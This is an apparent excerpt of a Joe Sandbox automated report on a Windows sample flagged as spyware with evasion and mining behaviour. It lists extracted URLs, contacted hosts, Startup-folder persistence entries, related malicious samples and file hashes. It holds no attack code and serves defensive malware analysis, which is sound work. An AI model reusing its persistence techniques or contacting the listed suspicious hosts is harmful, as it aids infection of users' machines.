                                                                                                                                            high
                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItaliaRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://support.reneelab.com/anonymous_requests/newRescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.reneelab.fr/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://downloads.reneelab.com.cn/download_api.phpRescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://dns.google/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ntp.msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.reneelab.cc/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://msn.com/msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://doh.quickline.ch/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.reneelab.de/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://wixtoolset.org/schemas/v4/2008/BurnkXzODlqJak.exe, 00000000.00000003.1465601064.0000000000758000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1465995762.000000000079A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1796485878.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1465995762.000000000074F000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1795762434.00000000057B0000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1795577677.0000000005300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://x1.c.lencr.org/0LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://x1.i.lencr.org/0LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://isecure-a.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0DRescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?acRescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://doh-02.spectrum.com/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipboRescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.reneelab.comRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://ntp.msn.com/LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.000000000803B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://bugreports.qt-project.org/RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.reneelab.com.cn/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.reneelab.pl/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-streaLocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.reneelab.comwww.reneelab.comhttp://https://0RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://xml.org/sax/features/namespacesRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.quad9.net/home/privacy/LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://isecure.reneelab.com.cn/webapi.php?code=RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                          high
IP    Domain    Country    Flag    ASN    ASN Name    Malicious
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          20.110.205.119
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          204.79.197.219
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                          chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          18.244.18.32
                                                                                                                                                                                                          sb.scorecardresearch.comUnited States
                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                          23.200.0.38
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          23.219.82.8
                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          104.21.80.52
                                                                                                                                                                                                          bamarelakij.siteUnited States
                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                          unknownunknownfalse
IP
192.168.2.8
192.168.2.4
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1586711
Start date and time: 2025-01-09 14:53:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: kXzODlqJak.exe (renamed because original name is a hash value)
Original Sample Name: 3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
Detection: MAL
Classification: mal100.spyw.evad.mine.winEXE@64/285@23/18
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 90
• Number of non-executed functions: 273
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 199.232.214.172, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.238, 13.107.6.158, 13.107.42.16, 2.16.168.107, 2.16.168.120, 108.141.15.7, 88.221.110.195, 88.221.110.179, 2.23.227.221, 2.23.227.215, 2.23.227.208, 204.79.197.237, 13.107.21.237, 2.23.227.216, 2.23.227.196, 2.23.227.197, 13.74.129.1, 172.205.80.42, 142.251.40.131, 142.250.80.67, 142.250.72.99, 142.250.65.163, 52.149.20.212, 13.107.246.45, 184.28.90.27, 94.245.104.56, 20.190.159.0, 23.200.0.6, 13.107.246.40, 13.91.222.61, 104.117.182.43, 20.75.60.91
• Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, prod-agic-ne-8.northeurope.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, assets2.msn.com.edgekey.net, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, arc.msn.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com
• Execution Graph export aborted for target RescueCDBurner.exe, PID 3772 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: kXzODlqJak.exe
Time | Type | Description
14:54:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT4269.tmp
14:54:47 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          23.219.82.19file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            162.159.61.3https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                                                                                  malw.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                    malw.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                        SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                              184.28.190.91file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                131.253.33.203https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUShttps://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 131.253.33.203
                                                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 204.79.197.219
                                                                                                                                                                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 20.189.173.28
                                                                                                                                                                                                                                                        https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 13.107.253.45
                                                                                                                                                                                                                                                        https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                        • 20.42.73.31
                                                                                                                                                                                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 22.170.57.197
                                                                                                                                                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 20.74.19.248
                                                                                                                                                                                                                                                        arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 20.64.30.232
                                                                                                                                                                                                                                                        arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 22.183.20.33
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | 8Rmoal0v85.exe | Get hash | malicious | Unknown | Browse |
 | K3UtwU3CH9.msi | Get hash | malicious | Unknown | Browse |
 | 24EPV9vjc5.exe | Get hash | malicious | Unknown | Browse |
 | VmjvNTbD5J.exe | Get hash | malicious | Unknown | Browse |
 | 1wrLmYiC62.exe | Get hash | malicious | Unknown | Browse |
 | vV5EOx0ipU.exe | Get hash | malicious | Unknown | Browse |
 | 8Rmoal0v85.exe | Get hash | malicious | Unknown | Browse |
 | cLm7ThwEvh.msi | Get hash | malicious | Unknown | Browse |
 | LVkAi4PBv6.exe | Get hash | malicious | Unknown | Browse |
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44629
                                                                                                                                                                                                                                                                          Entropy (8bit):6.096060598935859
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kUbLmZlGjrgb5UhUzvNbu7KwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynRGe5uKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:7E6363E2A8F5B669501459D245B7DBC4
                                                                                                                                                                                                                                                                          SHA1:7FFF20568EC8334BE23EB0636FB3254BE15163AE
                                                                                                                                                                                                                                                                          SHA-256:70419001F5F268B7421AF84356A5490FD59B16A072EF1842FC16981FB52AC539
                                                                                                                                                                                                                                                                          SHA-512:D27E15F5019C8784FB06DCC78D2E5236EEAAB0C62A8BD8C12DBB23EB15489C2707F20363AAD83607DC64F8729D65B265C2518FCE39631B56094598BE2AEA0DA9
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"...
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):44629
                                                                                                                                                                                                                                                                          Entropy (8bit):6.096060598935859
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kUbLmZlGjrgb5UhUzvNbu7KwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynRGe5uKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:7E6363E2A8F5B669501459D245B7DBC4
                                                                                                                                                                                                                                                                          SHA1:7FFF20568EC8334BE23EB0636FB3254BE15163AE
                                                                                                                                                                                                                                                                          SHA-256:70419001F5F268B7421AF84356A5490FD59B16A072EF1842FC16981FB52AC539
                                                                                                                                                                                                                                                                          SHA-512:D27E15F5019C8784FB06DCC78D2E5236EEAAB0C62A8BD8C12DBB23EB15489C2707F20363AAD83607DC64F8729D65B265C2518FCE39631B56094598BE2AEA0DA9
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"...
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"...
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                          Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                          MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                          SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                          SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                          SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                          Malicious:false
